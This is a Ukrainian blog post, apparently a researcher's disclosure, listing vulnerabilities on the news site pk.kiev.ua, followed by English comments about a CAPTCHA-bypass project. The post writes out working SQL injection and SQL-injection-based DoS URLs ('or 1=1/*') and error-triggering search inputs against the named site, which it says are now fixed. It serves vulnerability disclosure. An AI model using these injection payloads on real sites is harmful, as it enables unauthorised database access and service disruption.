Уразливості на www.pk.kiev.ua

19:38 05.05.2009

11.09.2007

У січні, 09.01.2007 (а також додатково сьогодні), я знайшов Cross-Site Scripting, SQL DB Structure Extraction, Full path disclosure, SQL Injection та DoS уразливості на проекті http://www.pk.kiev.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

05.05.2009

Зараз сайт http://www.pk.kiev.ua змінив домен на http://mycityua.com.

XSS:

SQL DB Structure Extraction:

http://www.pk.kiev.ua/search/?search=-

http://www.pk.kiev.ua/search/?search=1&section%5B10%5D=10-

http://www.pk.kiev.ua/search/?search=1&ordnung=date-

Full path disclosure:

http://www.pk.kiev.ua/search/?search=1&section%5B10%5D=10-

SQL Injection:

http://www.pk.kiev.ua/search/?search=news&section%5B10%5D=1000%20or%201=1/*

DoS (через SQL Injection):

http://www.pk.kiev.ua/search/?search=1&section%5B10%5D=1%20or%20chapter!=1000/*

Дані уразливості вже виправлені. Але як щойно глянув, в пошуці на оновленому сайті також є уразливості (Cross-Site Scripting, SQL DB Structure Extraction та SQL Injection), про що я з часом напишу.


6 відповідей на “Уразливості на www.pk.kiev.ua”

  1. Zoiz каже:

    Hi MustLive..you have a project on www.pk.kiev.ua? the transtool you gave me doesn’t works well :P heheh

  2. MustLive каже:

    Hi Zoiz!

    Yeah, I know that automatic translators are not so good :-) (and that tool in particular).

    No, man, it’s not my project. It is site where I found (in January) many holes - Cross-Site Scripting, SQL DB Structure Extraction, Full path disclosure, SQL Injection and DoS vulnerabilities. And I already sent message to admins of the site about these holes.

    I found vulns everyday on many sites in Internet. And I contact admins to inform them about holes at their sites (with announcement in my news without details). It is my work of social security audit (as I call it).

  3. MustLive каже:

    And Zoiz.

    Like I wrote in my post Bypassing CAPTCHA, I’ll write an article about my MustLive CAPTCHA bypass method. I’ll make article on Ukrainian and English, so you will can easily read it.

    And I am planning to make event about bypassing a lot of CAPTCHAs ;-) (with my method). So wait for official announcement.

  4. Zoiz каже:

    Ok…thanks so much bro :D I’ll come and check it very often :P

  5. MustLive каже:

    You are welcome, man :)

  6. MustLive каже:

    Zoiz. I already announced my new project Month of Bugs in Captchas.

Leave a Reply

You must be logged in to post a comment.